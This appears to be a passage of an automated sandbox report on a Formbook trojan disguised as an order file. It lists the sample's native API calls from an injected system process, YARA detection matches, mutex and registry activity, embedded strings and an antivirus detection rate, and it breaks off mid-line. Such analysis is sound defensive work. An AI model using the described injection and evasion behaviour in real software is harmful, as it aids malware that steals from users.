          Source: C:\Windows\SysWOW64\colorcpl.exe: Code function: 8_2_04569950 NtQueueApcThread
          Source: C:\Windows\SysWOW64\colorcpl.exe: Code function: 8_2_045699D0 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\colorcpl.exe: Code function: 8_2_04569A10 NtQuerySection
          Source: C:\Windows\SysWOW64\colorcpl.exe: Code function: 8_2_04569A00 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\colorcpl.exe: Code function: 8_2_04569A20 NtResumeThread
          Source: C:\Windows\SysWOW64\colorcpl.exe: Code function: 8_2_04569A80 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\colorcpl.exe: Code function: 8_2_04569B00 NtSetValueKey
          Source: C:\Windows\SysWOW64\colorcpl.exe: Code function: 8_2_0456A3B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\colorcpl.exe: Code function: 8_2_0255A060 NtClose
          Source: C:\Windows\SysWOW64\colorcpl.exe: Code function: 8_2_0255A110 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\colorcpl.exe: Code function: 8_2_02559F30 NtCreateFile
          Source: C:\Windows\SysWOW64\colorcpl.exe: Code function: 8_2_02559FE0 NtReadFile
          Source: C:\Windows\SysWOW64\colorcpl.exe: Code function: 8_2_0255A05A NtClose
          Source: C:\Windows\SysWOW64\colorcpl.exe: Code function: 8_2_02559F2B NtCreateFile
          Source: C:\Windows\SysWOW64\colorcpl.exe: Code function: String function: 0452B150 appears 35 times
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe: Code function: String function: 0131B150 appears 72 times
          Source: NEW ORDER ELO-05756485.exe: Binary or memory string: OriginalFilename vs NEW ORDER ELO-05756485.exe
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.353489494.00000000039D3000.00000004.00000001.sdmp: Binary or memory string: OriginalFilenameDSASignature.dll" vs NEW ORDER ELO-05756485.exe
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.351832870.0000000000B88000.00000004.00000020.sdmp: Binary or memory string: OriginalFilenameclr.dllT vs NEW ORDER ELO-05756485.exe
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.352221052.0000000002911000.00000004.00000001.sdmp: Binary or memory string: OriginalFilenameSimpleUI.dll2 vs NEW ORDER ELO-05756485.exe
          Source: NEW ORDER ELO-05756485.exe: Binary or memory string: OriginalFilename vs NEW ORDER ELO-05756485.exe
          Source: NEW ORDER ELO-05756485.exe, 00000002.00000002.393412768.00000000012C3000.00000040.00000001.sdmp: Binary or memory string: OriginalFilenamecolorcpl.exej% vs NEW ORDER ELO-05756485.exe
          Source: NEW ORDER ELO-05756485.exe, 00000002.00000002.393948133.000000000159F000.00000040.00000001.sdmp: Binary or memory string: OriginalFilenamentdll.dllj% vs NEW ORDER ELO-05756485.exe
          Source: NEW ORDER ELO-05756485.exe: Binary or memory string: OriginalFilenamePackingSize.exeB vs NEW ORDER ELO-05756485.exe
          Source: NEW ORDER ELO-05756485.exe: Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000002.00000002.392063770.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook_1; date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.392063770.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook; author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.353489494.00000000039D3000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Formbook_1; date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.353489494.00000000039D3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.392670755.0000000000D10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.392670755.0000000000D10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.392967604.0000000000E60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.392967604.0000000000E60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.598954001.0000000002B60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.598954001.0000000002B60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.598682434.0000000002540000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.598682434.0000000002540000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.NEW ORDER ELO-05756485.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.NEW ORDER ELO-05756485.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.NEW ORDER ELO-05756485.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.NEW ORDER ELO-05756485.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: NEW ORDER ELO-05756485.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@3/3
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NEW ORDER ELO-05756485.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5812:120:WilError_01
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeMutant created: \Sessions\1\BaseNamedObjects\eOVZmXVdxEDwjESg
          Source: NEW ORDER ELO-05756485.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.352221052.0000000002911000.00000004.00000001.sdmpBinary or memory string: Select * from UnmanagedMemoryStreamWrapper WHERE modelo=@modelo;?
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.352221052.0000000002911000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.352221052.0000000002911000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel5Erro ao listar Banco sql-UnmanagedMemoryStreamWrapper.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.352221052.0000000002911000.00000004.00000001.sdmpBinary or memory string: INSERT INTO UnmanagedMemoryStreamWrapper VALUES(@modelo, @fabricante, @ano, @cor);
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.352221052.0000000002911000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.352221052.0000000002911000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.352221052.0000000002911000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: NEW ORDER ELO-05756485.exeVirustotal: Detection: 37%
          Source: NEW ORDER ELO-05756485.exeReversingLabs: Detec